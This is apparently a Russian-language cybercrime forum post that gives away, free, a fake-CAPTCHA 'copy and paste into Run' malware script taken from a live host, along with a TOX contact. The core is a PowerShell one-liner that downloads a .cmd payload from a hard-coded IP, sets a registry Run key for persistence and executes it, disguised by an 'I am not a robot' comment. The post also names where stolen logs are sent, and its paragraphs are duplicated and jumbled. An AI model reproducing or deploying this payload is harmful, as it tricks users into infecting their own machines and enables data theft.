Цена: БЕСПЛАТНО
Я не утверждаю, что хорошо разбираюсь в вредоносных программах, криптографии или чем-то подобном. В последнее время я видел много разговоров о скриптах капчи, где жертвы вставляют скрипт в ctrl+r, и я видел, как люди взимают поглощающие суммы за что-то, что кажется довольно простым. Просто проведя собственные поиски, я нашел живой хост и захватил источник. Я не говорю, что это что-то особенное, но если кто-то может извлечь из этого пользу, отлично!
[/CODE]
Выше приведен прямой скрипт, который копируется в буфер обмена при нажатии на галочку. Пользователю предлагается получить основные инструкции по копированию/вставке скрипта. Я ничего не изменил в этом коде, так что вам придется многое изменить, когда вы увидите, куда идет информация журнала (https://alexbuckland.me/ в данный момент, вы будете таким же сумасшедшим, как и я.
TOX:5B6EE6845040440EC88F859037CEDB36BB1980263064CC5AC0FB464C57637820AB5D197CD497
Я не утверждаю, что хорошо разбираюсь в вредоносных программах, криптографии или чем-то подобном. В последнее время я видел много разговоров о скриптах капчи, где жертвы вставляют скрипт в ctrl+r, и я видел, как люди взимают поглощающие суммы за что-то, что кажется довольно простым. Просто проведя собственные поиски, я нашел живой хост и захватил источник. Я не говорю, что это что-то особенное, но если кто-то может извлечь из этого пользу, отлично!
JavaScript:
[CODE]powershell -c "iwr http://159.223.8.77/request/captcha.cmd -o $env:TEMP\reg.cmd; reg add 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /v S /t REG_SZ /d $env:TEMP\reg.cmd /f; Start $env:TEMP\reg.cmd" #I am not a robot - reCAPTCHA Verification ID: fdamcВыше приведен прямой скрипт, который копируется в буфер обмена при нажатии на галочку. Пользователю предлагается получить основные инструкции по копированию/вставке скрипта. Я ничего не изменил в этом коде, так что вам придется многое изменить, когда вы увидите, куда идет информация журнала (https://alexbuckland.me/ в данный момент, вы будете таким же сумасшедшим, как и я.
TOX:5B6EE6845040440EC88F859037CEDB36BB1980263064CC5AC0FB464C57637820AB5D197CD497